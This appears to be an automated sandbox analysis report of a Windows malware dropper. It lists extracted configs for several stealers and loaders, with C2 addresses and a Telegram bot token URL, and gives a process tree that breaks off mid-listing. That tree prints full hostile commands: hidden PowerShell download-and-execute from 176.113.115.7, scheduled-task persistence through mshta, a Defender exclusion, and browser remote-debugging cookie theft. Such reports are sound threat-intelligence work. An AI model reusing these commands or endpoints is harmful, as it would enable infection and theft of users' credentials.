Overview

overview

10

Static

static

3

00cd818e61...26.exe

windows7-x64

9

00cd818e61...26.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 17:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    00cd818e6149a6ef57207f806ea9936d2949726808cdddf1aa5409f5960b9926.exe

  • Size

    3.0MB

  • MD5

    e5f2d167ec62a0243fe69b901cd9e4de

  • SHA1

    76e03e618b5635d56fc4a4ecf7a6a3139b47489e

  • SHA256

    00cd818e6149a6ef57207f806ea9936d2949726808cdddf1aa5409f5960b9926

  • SHA512

    7edee8d8b346ef5a3e17759a0d5271584191a0f8e482515bbf01ed20b14ec32ccbdd57874ff42b8571921efc46f3cee39a55ab84782ee2163645b30eabb25923

  • SSDEEP

    49152:bIlcor8y8/CvyiI0vGlyox2GJyJErPJ8UdYXybZqP0F9vK:afp8/Cvt9IpJyOrPJ8UbD

Score
10/10
amadeygcleanergurcuhealerlitehttpphemedronestealc092155trumpbotcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

gurcu

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocumen

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Phemedrone family
    phemedrone
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Downloads MZ/PE file 24 IoCs
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 34 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 17 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 40 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 10 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\00cd818e6149a6ef57207f806ea9936d2949726808cdddf1aa5409f5960b9926.exe
    "C:\Users\Admin\AppData\Local\Temp\00cd818e6149a6ef57207f806ea9936d2949726808cdddf1aa5409f5960b9926.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Downloads MZ/PE file
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Users\Admin\AppData\Local\Temp\2HA4XQ5LSXYC4O9Q256AJ4.exe
      "C:\Users\Admin\AppData\Local\Temp\2HA4XQ5LSXYC4O9Q256AJ4.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2036
        • C:\Users\Admin\AppData\Local\Temp\10104610101\2176473caf.exe
          "C:\Users\Admin\AppData\Local\Temp\10104610101\2176473caf.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:5108
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn rbumKma6FOG /tr "mshta C:\Users\Admin\AppData\Local\Temp\g3sJQOQp9.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn rbumKma6FOG /tr "mshta C:\Users\Admin\AppData\Local\Temp\g3sJQOQp9.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2256
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\g3sJQOQp9.hta
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3992
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YVYT4EZNL8ANFKSEPH5TFK99D0GDFW89.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4844
              • C:\Users\Admin\AppData\Local\TempYVYT4EZNL8ANFKSEPH5TFK99D0GDFW89.EXE
                "C:\Users\Admin\AppData\Local\TempYVYT4EZNL8ANFKSEPH5TFK99D0GDFW89.EXE"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2792
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:4744
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2636
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2384
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3140
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4488
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3388
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "jpRcJmaHOBt" /tr "mshta \"C:\Temp\KIsiQSVP2.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:3608
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\KIsiQSVP2.hta"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            PID:2256
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2692
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:568
        • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
          "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3816
          • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
            "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2740
            • C:\Users\Admin\AppData\Roaming\Nnpze03hcA.exe
              "C:\Users\Admin\AppData\Roaming\Nnpze03hcA.exe"
              6⤵
              • Executes dropped EXE
              PID:3924
            • C:\Users\Admin\AppData\Roaming\Sx0stcfrWo.exe
              "C:\Users\Admin\AppData\Roaming\Sx0stcfrWo.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:404
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 788
            5⤵
            • Program crash
            PID:4952
        • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
          "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1572
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\SYJABidz\Anubis.exe""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3140
          • C:\Users\Admin\AppData\Roaming\32N7QJR.exe
            "C:\Users\Admin\AppData\Roaming\32N7QJR.exe"
            5⤵
            • Executes dropped EXE
            PID:2456
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3972
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4980
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4540
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3620
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3968
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4988
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2384
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4188
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1976
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2496
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4444
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2656
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4352
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1676
            • C:\Windows\system32\tasklist.exe
              "tasklist"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1640
            • C:\Windows\system32\tasklist.exe
              "tasklist" /FO CSV /NH
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:5036
            • C:\Windows\system32\taskkill.exe
              "taskkill" /F /IM Discord.exe
              6⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3352
            • C:\Windows\system32\tasklist.exe
              "tasklist" /FI "IMAGENAME eq chrome.exe"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:4536
            • C:\Windows\system32\tasklist.exe
              "tasklist" /FI "IMAGENAME eq msedge.exe"
              6⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2488
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=8591 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --start-minimized
              6⤵
              • Uses browser remote debugging
              • Suspicious use of AdjustPrivilegeToken
              PID:4048
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc47d9cc40,0x7ffc47d9cc4c,0x7ffc47d9cc58
                7⤵
                  PID:3672
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1456,i,14207271258145125161,10581062745246902148,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1448 /prefetch:2
                  7⤵
                    PID:3172
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1760,i,14207271258145125161,10581062745246902148,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1756 /prefetch:3
                    7⤵
                      PID:1716
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=8704 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --start-minimized
                    6⤵
                    • Uses browser remote debugging
                    PID:3440
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc477b46f8,0x7ffc477b4708,0x7ffc477b4718
                      7⤵
                        PID:2472
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1524,17383847220682139636,13625116799274109238,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1532 /prefetch:2
                        7⤵
                          PID:964
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,17383847220682139636,13625116799274109238,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1896 /prefetch:3
                          7⤵
                            PID:1652
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8704 --allow-pre-commit-input --field-trial-handle=1524,17383847220682139636,13625116799274109238,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2072 /prefetch:1
                            7⤵
                            • Uses browser remote debugging
                            PID:788
                        • C:\Windows\system32\tasklist.exe
                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5348
                        • C:\Windows\system32\tasklist.exe
                          "tasklist" /FI "IMAGENAME eq msedge.exe"
                          6⤵
                          • Enumerates processes with tasklist
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5228
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=8776 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --start-minimized
                          6⤵
                          • Uses browser remote debugging
                          PID:2360
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc5e7846f8,0x7ffc5e784708,0x7ffc5e784718
                            7⤵
                              PID:4900
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1140,17255393809855046597,16157668261644825982,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1456 /prefetch:2
                              7⤵
                                PID:5680
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1140,17255393809855046597,16157668261644825982,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1864 /prefetch:3
                                7⤵
                                  PID:5552
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8776 --allow-pre-commit-input --field-trial-handle=1140,17255393809855046597,16157668261644825982,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2016 /prefetch:1
                                  7⤵
                                  • Uses browser remote debugging
                                  PID:2980
                              • C:\Windows\system32\tasklist.exe
                                "tasklist" /FI "IMAGENAME eq chrome.exe"
                                6⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5616
                              • C:\Windows\system32\tasklist.exe
                                "tasklist" /FI "IMAGENAME eq chrome.exe"
                                6⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5372
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
